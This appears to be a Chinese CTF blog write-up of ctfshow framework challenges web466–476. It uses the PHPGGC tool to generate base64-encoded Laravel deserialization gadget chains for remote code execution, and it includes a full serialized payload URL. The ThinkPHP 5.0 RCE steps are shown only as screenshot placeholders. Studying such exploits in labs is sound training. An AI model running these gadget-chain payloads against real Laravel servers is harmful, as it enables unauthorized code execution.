ctfshow 框架复现 工具版

最新推荐文章于 2024-08-29 09:09:11 发布
最新推荐文章于 2024-08-29 09:09:11 发布
阅读量496 收藏 9
点赞数 9
文章标签: 经验分享 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/140695139
版权

工具

首先下载工具PHPGGC
GitHub地址

./phpggc -l

在这里插入图片描述

web466

Laravel5.4

是这个版本的漏洞那么我们去看看那个poc链是这个版本的

Laravel/RCE2可以

命令

./phpggc -i Laravel/RCE2

在这里插入图片描述
题目提示要base64编码提交

./phpggc Laravel/RCE2 system 'ls /'|base64

成功RCE
在这里插入图片描述

https://31a97292-2e35-4d95-b771-dcdd6939a2f8.challenge.ctf.show/admin/Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIA
KgBldmVudHMiO086Mjg6IklsbHVtaW5hdGVcRXZlbnRzXERpc3BhdGNoZXIiOjE6e3M6MTI6IgAq
AGxpc3RlbmVycyI7YToxOntzOjc6InRhYyAvZioiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX1z
Ojg6IgAqAGV2ZW50IjtzOjc6InRhYyAvZioiO30K

web467

Laravel5.5

命令

./phpggc Laravel/RCE3 system 'ls /'|base64
打不通,难道版本不对?哦也对,他没说后续版本

./phpggc -i Laravel/RCE3

在这里插入图片描述
这条链子会触发异常类也就是说会影响直接的代码执行,RCE2的版本肯定行
但是我偏要用RCE3

./phpggc Laravel/RCE3 system 'tac /f*> 1.txt'|base64

在这里插入图片描述
干这里来了?

web468

Laravel5.5版本

命令

./phpggc Laravel/RCE3 system 'tac /f*> 1.txt'|base64

在这里插入图片描述

web469

Laravel5.5版本

命令

./phpggc Laravel/RCE4 system 'tac /f*> 1.txt'|base64

在这里插入图片描述
在这里插入图片描述

web470

Laravel5.5版本

./phpggc Laravel/RCE9 system 'tac /f*> 1.txt'|base64

web471

Laravel5.8版本

其实可以用的链子有很多

./phpggc Laravel/RCE13 system 'tac /f*> 1.txt'|base64

web472

Laravel8.1版本

./phpggc Laravel/RCE15 system 'tac /f*> 1.txt'|base64

web473

thinkphp5.0.15

在这里插入图片描述
扫描发现good
在这里插入图片描述
利用工具,这个工具我也是和师傅们要到的,非常感谢那位师傅
在这里插入图片描述

web474

thinkphp5.0.5

在这里插入图片描述
payload可能错了
在这里插入图片描述
在这里插入图片描述
无回显
在这里插入图片描述

web475

thinkphp 5.0.0-5.0.23 rce

在这里插入图片描述

web476

thinkphp 5.0.0-5.0.23 rce

在这里插入图片描述
在这里插入图片描述

baozongwi
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Struts2漏洞复现工具
06-24
Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具Struts2漏洞复现工具
基于 PaddlePaddle 框架复现使用 TensorFlow 框架的Voronoi镶嵌辅助深度学习稀疏传感器全局场重建技术
05-09
本项目基于 PaddlePaddle 框架复现使用 TensorFlow 框架的Voronoi镶嵌辅助深度学习稀疏传感器全局场重建技术。This project is based on the PaddlePaddle framework to replicate the ….zip
ctfshow 框架复现
akdelt的博客
05-05 426
又出现 debug 页面了。而且还得换 RCE9。Laravel RCE3 用不了了,我们用 4。生成后发现不行,反序列化结果会被调试页面覆盖。我们已经知道原理了,直接工具打吧。生成链子,这里我们用 RCE3。然后访问 1.txt 就行了。查看各种应用各种本的链子。写一个脚本遍历所有 rce。快一点吧直接工具梭哈了。但是没有回显,写🐎进去。然后访问 1.txt。
ctfshow 框架复现 web467-web475
cht6667的博客
02-23 471
通过使用工具通过,以后仔细研究原理,读者可以自己研究相关实现细节
CTFshow刷题日记-WEB-JAVA(web279-300)Struts2全漏洞复现,Java漏洞复现
热门推荐
Love&Share
10-12 1万+
全部题都是struts2框架漏洞 Struts2是用Java语言编写的一个基于MVC设计模式的Web应用框架 关于struts2漏洞,vulhub都有环境并且给出了漏洞原理和poc GitHub项目地址:https://github.com/vulhub/vulhub/tree/master/struts2 判断网站是否基于Struts2的方法链接 通过页面回显的错误消息来判断,页面不回显错误消息时则无效 通过网页后缀来判断,如.do .action,有可能不准 如果配置文件中常数extension的值
漏洞复现 Fastadmin框架 lang任意文件读取漏洞
weixin_43167326的博客
06-16 2178
FastAdmin 后台框架开源且可以免费商用,一键生成 CRUD, FastAdmin 是一款基于 ThinkPHP 和 Bootstrap 的极速后台开发框架,基于Auth验证的权限管理系统,一键生成 CRUD,自动生成控制器、模型、视图、JS、语言包、菜单、回收站等。(Fast Admin 极速 后台 框架)Fastadmin框架 lang接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。
CTFshow Java
starttv的博客
11-17 1426
OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用和类方法执行等)来修补,但是安全配置被绕过再次导致了漏洞,攻击者可以利用OGNL表达式将这2个选项打开,S2-003的修补方案把自己上了一个锁,但是把锁钥匙给插在了锁头上。通常tomcat的做法是解压,编译里面的代码,所以当文件很多的时候,tomcat的启动会很慢。
Ctfshow 反序列化
qq_74806534的博客
03-17 1423
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI就是服务器端模板注入SSTI也是,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后在后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,
yii反序列化漏洞复现及利用
cosmoslin的博客
10-05 4734
yii反序列化漏洞 Yii框架 Yii 是一个适用于开发 Web2.0 应用程序的高性能PHP 框架。 Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。 Yii 当前有两个主要本:1.1 和 2.0。 1.1 是上代的老本,现在处于维护状态。 2.0 是一个完全重写的本,采用了最新的技术和协议
ctfshow-WEB-web5_ctfshow web5
2401_84240129的博客
06-19 673
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
ctfshow反序列化
njh18790816639的博客
04-18 1124
payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload来做一些事情 exp (Exploit )漏洞利用,一般是个demo程序 poc(Proof of Concept)漏洞证明,一般就是个样本 用来证明和复现 vul:(Vulnerability) :漏洞 Pwn:是一个
vnc漏洞检测和复现工具
11-11
vnc漏洞检测和复现工具 5900端口
奇安信渗透测试岗位三面经验分享
liguangyao213的博客
08-25 1645
吉祥知识星球《网安面试指南》《Java代码审计》《Web安全》《应急响应》《护网资料库》我投的是部门直招,没有笔试,直接给我安排的面试简单说一下什么是部门直招,部门直招一般是奇安信各省安服自己有hc自己给自己招,不用通过公司的统一宣讲,这种一般没有笔试,直接面试,这种一般有3面,1个技术面,1个技术组长(省安服负责人)面,1个hr面;
【网络安全】服务基础第一阶段——第二节:Windows系统管理基础----虚拟化IP地址以及用户与组管理
goldfish8848的博客
08-25 1420
不同的用户身份拥有不同的权限,每个用户包含一个名称和一个密码,用户账户拥有唯一的安全标识Windows系统中,每个用户账户都有一个独特的安全标识符(SID,Security Identifier)它在系统内部用于控制对各种资源的访问权限。我们可以通过不同的方法查看用户的SID:1.使用命令提示符(CMD)这里的CMD就是我们常用的命令提示符(类似于终端的那个窗口),输入命令来查看当前登陆用户的SID如果需要查看特定用户的SID,可以使用命令。
网络安全(黑客)——自学2024
2401_84466325的博客
08-25 1172
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
人工智能在网络安全领域的应用探索
最新发布
A526847的博客
08-29 632
随着网络技术的飞速发展,网络安全问题日益凸显,成为制约数字化进程的重要瓶颈。人工智能(AI)作为一种变革性技术,正逐步在网络安全领域展现出其巨大的潜力和价值。本文旨在探讨人工智能在网络安全领域的应用现状、优势、挑战及未来发展趋势。
华为QXDM工具全面指南:中文详解与关键功能
QXDM工具使用指导书是华为提供的一份详细的中文文档,旨在帮助用户理解和操作华为的QXDM工具。QXDM是一个强大的手机测试和诊断平台,主要用于无线通信网络的调试、配置和性能分析。这份指南涵盖了QXDM工具套件的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值